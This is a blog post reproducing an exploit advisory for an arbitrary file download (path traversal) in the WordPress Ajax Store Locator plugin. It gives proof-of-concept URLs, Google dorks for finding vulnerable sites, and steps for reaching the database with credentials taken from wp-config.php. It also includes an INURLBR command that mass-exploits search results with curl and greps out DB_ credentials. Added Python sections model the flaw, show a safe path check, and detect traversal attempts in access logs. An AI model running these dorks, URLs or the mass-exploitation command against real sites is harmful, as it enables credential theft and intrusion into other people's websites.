Thursday, 22 January 2015

WordPress Ajax Store Locator Arbitrary File Download

# Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator
# Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
# PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
or
http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
"download_file" variable is not sanitized.
################
Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
################
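The unsanitised download_file parameter in the advisory above is a plain path traversal: the handler joins the request value onto its own directory, so ../../../wp-config.php walks three levels up (plugin dir, plugins, wp-content) to the WordPress root and the database credentials are served back. The Python below is an added example, not the plugin's code (its PHP is not reproduced here): a hypothetical naive_download_path that behaves the way the advisory describes, next to a safe_download_path that resolves the path and refuses anything outside the directory the handler is meant to serve. The directory tree it works on is constructed in a temporary directory.

```python
import os
import shutil
import tempfile

# Added example, not the plugin's code: a model of a "download a file by
# name" handler, first in the naive form the advisory describes, then
# hardened so that the resolved path must stay inside the served directory.


def naive_download_path(base_dir, requested):
    """Unsafe: joins the user-supplied name onto the base directory.
    '../' components walk out of base_dir, so ../../../wp-config.php
    resolves to the WordPress root."""
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_download_path(base_dir, requested):
    """Hardened: reject null bytes and absolute paths, resolve symlinks on
    both sides, and require the target to live under base_dir."""
    if "\x00" in requested or os.path.isabs(requested):
        raise ValueError("rejected download_file: %r" % requested)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("rejected download_file: %r" % requested)
    return target


def build_demo_tree():
    """Constructed layout: a fake wp-config.php at the root and the plugin
    directory three levels below it, as on a real WordPress install."""
    root = tempfile.mkdtemp()
    plugin_dir = os.path.join(root, "wp-content", "plugins",
                              "ajax-store-locator-wordpress")
    os.makedirs(plugin_dir)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'pass_database');\n")
    with open(os.path.join(plugin_dir, "stores.csv"), "w") as f:
        f.write("store,city\n")
    return root, plugin_dir


def demo():
    """Returns (naive handler escaped, hardened handler blocked,
    hardened handler still serves a legitimate file)."""
    root, plugin_dir = build_demo_tree()
    try:
        payload = "../../../wp-config.php"
        naive = naive_download_path(plugin_dir, payload)
        escaped = (os.path.isfile(naive)
                   and os.path.basename(naive) == "wp-config.php")
        try:
            safe_download_path(plugin_dir, payload)
            blocked = False
        except ValueError:
            blocked = True
        allowed = safe_download_path(plugin_dir, "stores.csv").endswith("stores.csv")
        return escaped, blocked, allowed
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path rather than by stripping "../" from the string: a filter that removes "../" is bypassed by "....//" and by URL-encoded variants, whereas comparing realpath() results closes all of them at once.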
More dorks:
  • index of /wp-content/plugins/ajax-store-locator-wordpress/ site:com/uk/org/br/..etc..
Example of the database section of a retrieved wp-config.php:
define('DB_NAME', 'name_database');
/** MySQL database username */
define('DB_USER', 'user_database');
/** MySQL database password */
define('DB_PASSWORD', 'pass_database');
/** MySQL hostname */
define('DB_HOST', 'address_database');
If DB_HOST is set to localhost, you can check whether the database is reachable at the following addresses:
mysql.site-name.com
or
site-name.com:3306 (if this port is open you need a SQL client,
  e.g. HeidiSQL on Windows, or the mysql client from a Linux console,
  e.g. mysql --host site-address.com --user user --password='password')
or
site-name.com/phpmyadmin
Note that a DB_HOST of localhost usually means MySQL listens only on the local socket, and the account in wp-config.php is normally granted as 'user'@'localhost', so a remote login only works where port 3306 is exposed and the user has also been granted access from remote hosts.
Exploiting this vulnerability through the browser works, but it becomes tedious, so let's use a script that does all the searching and keeps the results organized for us.
Using the INURLBR script to automate the search process:
Command:
inurlbr.php --dork 'inurl:"ajax-store-locator" site:com' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' -t 3 --exploit-comand '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
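Two additions around the INURLBR command above (example code, not part of the original post or of INURLBR): parse_db_defines() does what the curl ... | grep "DB_" step does but returns the constants as a dict, and flag_traversal_requests() is the defender's side, scanning combined-format access log lines for requests to sl_file_download.php whose download_file value walks up the tree, after URL-decoding. The wp-config.php text and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not code from the original post or from INURLBR.

# Constructed sample of the database section of a retrieved wp-config.php.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'name_database');
/** MySQL database username */
define('DB_USER', 'user_database');
/** MySQL database password */
define('DB_PASSWORD', 'pass_database');
/** MySQL hostname */
define('DB_HOST', 'localhost');
"""

# Constructed combined-format access log lines: two exploitation attempts
# (plain and URL-encoded traversal), one legitimate download, one unrelated.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [22/Jan/2015:10:00:01 +0000] "GET /wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 200 3210 "-" "curl/7.38.0"',
    '203.0.113.5 - - [22/Jan/2015:10:00:02 +0000] "GET /wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=%2e%2e%2f%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3210 "-" "curl/7.38.0"',
    '198.51.100.7 - - [22/Jan/2015:10:00:03 +0000] "GET /wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=stores.csv HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jan/2015:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

DEFINE_RE = re.compile(
    r"""define\(\s*['"](DB_[A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

TARGET_SCRIPT = "sl_file_download.php"


def parse_db_defines(wp_config_text):
    """Return the DB_* constants defined in a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(wp_config_text))


def is_traversal_request(request_target):
    """True if the request hits the download script with a download_file
    value that escapes the plugin directory. parse_qs decodes once; the
    extra unquote calls catch double-encoded variants as well."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(TARGET_SCRIPT):
        return False
    for value in parse_qs(parts.query).get("download_file", []):
        decoded = unquote(unquote(value)).replace("\\", "/")
        if ".." in decoded.split("/") or decoded.startswith("/"):
            return True
    return False


def flag_traversal_requests(log_lines):
    """Scan access log lines and return the requests that look like
    exploitation attempts, with the status code so that served files (200)
    can be told apart from blocked or missing ones."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_traversal_request(m.group("path")):
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    print(parse_db_defines(SAMPLE_WP_CONFIG))
    for hit in flag_traversal_requests(SAMPLE_LOG_LINES):
        print(hit)
```

In the log output a 200 to a wp-config.php request is the entry to escalate: the file was served and the database credentials should be treated as disclosed and rotated. 403 or 404 entries still show that the host is being scanned, which the dorks above make easy.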

Video: WordPress_Ajax_Store_Locator_Arbitrary_file_download from Mathew Thomas on Vimeo.

